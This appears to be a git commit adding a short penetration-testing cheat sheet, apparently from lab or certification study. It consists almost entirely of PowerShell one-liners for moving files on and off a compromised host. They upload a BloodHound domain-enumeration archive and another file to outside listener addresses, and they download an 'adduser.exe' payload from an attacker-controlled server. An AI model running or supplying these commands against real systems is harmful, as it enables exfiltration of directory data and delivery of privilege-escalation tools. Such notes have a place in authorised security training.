first commit

This commit is contained in:
2025-11-21 17:17:42 +01:00
commit 4cad18c2a5
285 changed files with 122106 additions and 0 deletions
+17
View File
@@ -0,0 +1,17 @@
Download file
Upload file
`
`
`(New-Object System.Net.WebClient).UploadFile('http://192.168.45.206:8000/', '20240917122437_BloodHound.zip')`
```powershell
iwr -uri http://192.168.45.224:8000/adduser.exe -Outfile adduser.exe
```
```powershell
$uri="http://192.168.118.2/upload/"
$uploadPath="file.txt"
$wc = New-Object System.Net.WebClient
$resp = $wc.UploadFile($uri,$uploadPath)
```